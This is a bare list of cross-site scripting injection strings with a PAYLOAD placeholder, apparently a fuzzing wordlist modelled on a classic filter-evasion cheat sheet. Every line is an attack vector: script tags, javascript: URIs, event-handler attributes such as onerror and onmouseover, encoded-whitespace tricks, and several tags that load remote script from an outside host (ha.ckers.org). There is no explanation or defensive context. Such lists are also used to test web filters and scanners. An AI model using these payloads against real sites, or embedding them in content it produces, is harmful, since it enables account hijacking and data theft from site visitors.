';PAYLOAD;'
<svg><script>PAYLOAD<p>
<svg><x><script>PAYLOAD</x>
'';!--"<PAYLOAD>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:PAYLOAD;">
<IMG SRC=javascript:PAYLOAD>
<IMG SRC=JaVaScRiPt:PAYLOAD>
<IMG SRC=javascript:PAYLOAD>
<IMG SRC=`javascript:PAYLOAD`>
<a onmouseover="PAYLOAD">PAYLOAD link</a>
<a onmouseover=PAYLOAD>PAYLOAD link</a>
<IMG """><SCRIPT>PAYLOAD</SCRIPT>">
<IMG SRC=javascript:PAYLOAD>
<IMG SRC=# onmouseover="PAYLOAD">
<IMG SRC= onmouseover="PAYLOAD">
<IMG onmouseover="PAYLOAD">
<IMG SRC=/ onerror="PAYLOAD"></img>
<IMG SRC="jav	ascript:PAYLOAD;">
<IMG SRC="jav&#x09;ascript:PAYLOAD;">
<IMG SRC="jav&#x0A;ascript:PAYLOAD;">
<IMG SRC="jav&#x0D;ascript:PAYLOAD;">
<IMG SRC=" &#14;  javascript:PAYLOAD;">
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=PAYLOAD>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>PAYLOAD;//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:PAYLOAD"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";PAYLOAD;//
</TITLE><SCRIPT>PAYLOAD;</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:PAYLOAD;">
<BODY BACKGROUND="javascript:PAYLOAD">
<IMG DYNSRC="javascript:PAYLOAD">
<IMG LOWSRC="javascript:PAYLOAD">
<STYLE>li {list-style-image: url("javascript:PAYLOAD");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:PAYLOAD">
<BODY ONLOAD=PAYLOAD>